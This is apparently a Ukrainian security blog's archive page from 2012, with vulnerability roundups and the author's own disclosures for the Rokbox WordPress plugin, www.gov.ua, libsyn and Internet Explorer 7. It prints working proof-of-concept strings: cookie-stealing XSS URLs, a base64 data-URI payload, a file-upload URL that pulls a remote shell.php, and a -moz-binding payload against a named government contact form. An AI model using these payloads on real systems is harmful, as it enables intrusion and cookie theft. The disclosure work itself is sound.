Архів для категорії 'Уразливості'

Добірка уразливостей

17:24 15.12.2012

В даній добірці уразливості в веб додатках:

  • EMC Cloud Tiering Appliance (CTA) Authentication Bypass Vulnerability (деталі)
  • Multiple vulnerabilities in BabyGekko (деталі)
  • Multiple Vulnerabilities in Smartphone Pentest Framework (SPF) (деталі)
  • Open-Realty CMS 2.5.8 (2.x.x) <= Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS) (деталі)
  • SysAid Helpdesk Pro Blind SQL Injection (деталі)
  • Squiz CMS File Path Traversal (деталі)
  • SilverStripe CMS - Multiple Vulnerabilities (деталі)
  • Cross-site scripting (XSS) vulnerability in HP Service Manager and HP Service Center (деталі)
  • BugTracker.Net Multiple Security Vulnerabilities (деталі)

Численні уразливості в Rokbox для WordPress

23:58 14.12.2012

24.08.2012

У липні, 28.07.2012, я виявив численні уразливості в плагіні Rokbox для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload, Content Spoofing та Information Leakage уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в Rokbox для Joomla та WordPress. Стосовно плагінів для WordPress раніше я писав про уразливості в Organizer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

14.12.2012

В плагіні Rokbox для WordPress використовуються TimThumb 1.16 та JW Player 4.4.198, тому окрім своїх власних дірок, він має ще дірки цих веб додатків.

На сайтах в основному використовується папка wp_rokbox, але трапляються сайти з папкою rokbox.

XSS (в Rokbox з більш старими версіями TimThumb) (WASC-08):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Та FPD, Abuse of Functionality і DoS в уразливості в TimThumb в усіх версіях Rokbox. А також Arbitrary File Upload уразливість, що була оприлюднена минулого року через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php

Content Spoofing (WASC-12):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Information Leakage (WASC-13):

http://site/wp-content/plugins/wp_rokbox/error_log

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokbox/rokbox.php

До CS і XSS в JW Player і FPD вразливі всі версії Rokbox для WordPress (Rokbox 2.13 і попередні), а от IL та уразливості в TimThumb були виправлені. Після мого повідомлення в серпні розробники замінили TimThumb на phpThumb, тому версія 2.13 невразлива до них.

Уразливості в OSMF та Strobe Media Playback

23:54 13.12.2012

Ще у травні, 04.05.2012, я виявив Content Spoofing уразливості в Open Source Media Framework (OSMF) та Strobe Media Playback. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

Уразливості на www.gov.ua

17:20 13.12.2012

25.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting, Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.gov.ua - “головному” gov.ua домені. Про XSS мені повідомив AmplenuS, а коли я ці дірки перевірив, то знайшов іще BF, CSRF, AoF та IAA дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.12.2012

XSS:

POST запит на сторінці http://www.gov.ua/contact.html (це приклад коду для атаки на Mozilla і Firefox < 3.0, для інших браузерів можливі інші варіанти атакуючого коду).

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')"

В полях: Зворотня адреса, Ваше ПIБ, Доменне ім’я, Текст повідомлення.

Brute Force:

http://www.gov.ua/manager/

Cross-Site Request Forgery:

http://www.gov.ua/manager/

Abuse of Functionality:

В формі логіна http://www.gov.ua/manager/ можна виявляти логіни користувачів (Login enumeration).

Insufficient Anti-automation:

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів).

Якщо BF, AoF та IAA уразливості вже виправлені, шляхом обмеження доступу до папки з адмінкою (що не вирішило проблеми з CSRF), то XSS досі не виправлені.

Уразливості в плагінах для WordPress №82

23:55 11.12.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Facebook Survey, Simple Slider та Zingiri Web Shop. Для котрих з’явилися експлоіти. Facebook Survey - це плагін для проведення опитувань на FB, Simple Slider - це плагін для створення та управління слайдшоу, Zingiri Web Shop - це плагін для створення онлайн магазина.

  • Wordpress Facebook Survey v1 - SQL Injection Vulnerability (деталі)
  • XSS Vulnerability in Simple Slider Wordpress Plugin (деталі)
  • WordPress Zingiri Web Shop 2.5.0 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 11.12.2012

В даній добірці уразливості в веб додатках:

  • HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information (деталі)
  • Cross-Site Request Forgery (CSRF) in CMS Made Simple (деталі)
  • BananaDance Wiki b2.2 - Multiple Web Vulnerabilities (деталі)
  • Eventy CMS v1.8 Plus - Multiple Web Vulnerablities (деталі)
  • (0Day) HP Intelligent Management Center img.exe Integer Wrap Remote Code Execution Vulnerability (деталі)
  • iDev Rentals v1.0 - Multiple Web Vulnerabilities (деталі)
  • Security advisory for Bugzilla 4.4rc1, 4.2.4, 4.0.9 and 3.6.12 (деталі)
  • typo3-src security update (деталі)
  • HP Serviceguard, Remote Denial of Service (DoS) (деталі)
  • Django vulnerability (деталі)

Уразливості в платформі libsyn

23:57 01.12.2012

У вересні, 27.09.2012, я знайшов Cross-Site Scripting уразливість на libsyn.com - в платформі libsyn (Liberated Syndication). Про що декілька разів сповіщав адміністрацію сайта, як по емайлу, так і через контакту форму (у вересні і в жовтні). Але вони проігнорували і так досі не виправили уразливість, що стосується великої кількості сайті на цій платформі.

XSS:

Приклад на одному сайті на libsyn:

Скріншот:

libsyn XSS.png

Є багато веб сайтів вразливих до цієї XSS уразливості (в тому числі секюріті сайти). Майже всі сайти на платформі libsyn є вразливими (я перевірив чимало сайтів і більшість з них була вразлива).

За даними Гугл у libsyn.com велика кількість піддоменів. Сторінок на всіх піддоменах (окрім www.libsyn.com) було:

27.09.2012 - 1890000
01.12.2012 - 2080000

Це сторінок. З них можна вирахувати приблизну кількість сайтів Тобто на цій платформі розміщено орієнтовно від 100000 до одного мільйона сайтів.

DoS в Internet Explorer 7

20:18 01.12.2012

В записі Cross-Site Scripting уразливості в різних браузерах, я згадував про DoS уразливості в сьомому IE. Ось детальна інформація про них.

Під час досліджень XSS в різних браузерах, 05.08.2010 та 16.09.2012, я виявив Denial of Service уразливості в Internet Explorer 7. Що цікаво, IE6 та IE8 невразливі, тільки IE7.

DoS:

При включенні редиректора з відповіддю 301, 302 або 303 і data: URI в заголовку Location у тег frame або iframe, браузер вибиває (атака не працює при інших 30x статусах). Це відбувається через access violation (aka segmentation fault) в iexplore.exe.

Експлоіт:

IE7 DoS.txt

Це 302 редиректор на Perl. А в якості 301 редиректора можете використати мій приклад з data: URI на TinyURL:

http://tinyurl.com/fj4hm

Атака спрацьовує лише з другої спроби. Тому потрібно двічі звернутися до редиректора (двічі вказати URL в адресному рядку, чи після появи сторінки про помилку повернутися на попередню сторінку в браузері).

Приклад атаки через уразливість на сайті ООН:

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm

Уразливі Internet Explorer 7 (7.00.5730.13) та інші версії IE7.

Уразливості в плагінах для WordPress №81

23:52 30.11.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wordpress Brute Force Tool, WP E-Commerce та Tagged Albums. Для котрих з’явилися експлоіти. Wordpress Brute Force Tool - це інструмент для проведення брутфорс атак на Wordpress, WP E-Commerce - це плагін для створення онлайн магазину, Tagged Albums - це плагін для створення фото альбомів з тегами.

  • Janissaries Wordpress Brute Force Tool (деталі)
  • WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting (деталі)
  • WordPress Tagged Albums SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:21 29.11.2012

В даній добірці уразливості в веб додатках:

  • Novell eDirectory RelativeToFullDN Parsing Remote Code Execution Vulnerability (деталі)
  • NetCat CMS v5.0.1 - Multiple Web Vulnerabilities (деталі)
  • PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities (деталі)
  • VaM Shop v1.69 - Multiple Web Vulnerabilities (деталі)
  • GE Proficy Real-Time Information Portal Remote Interface Service Remote Code Execution Vulnerability (деталі)
  • XSS in dokeos 2.1.1 (деталі)
  • EmpireCMS Template Parser Remote PHP Code Execution Vulnerability (деталі)
  • AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities (деталі)
  • Lsoft ListServ v16 (WA revision R4241) SHOWTPL parameter Cross-SIte Scripting - XSS (деталі)
  • Vulnerability Report on AWCM 2.2 (деталі)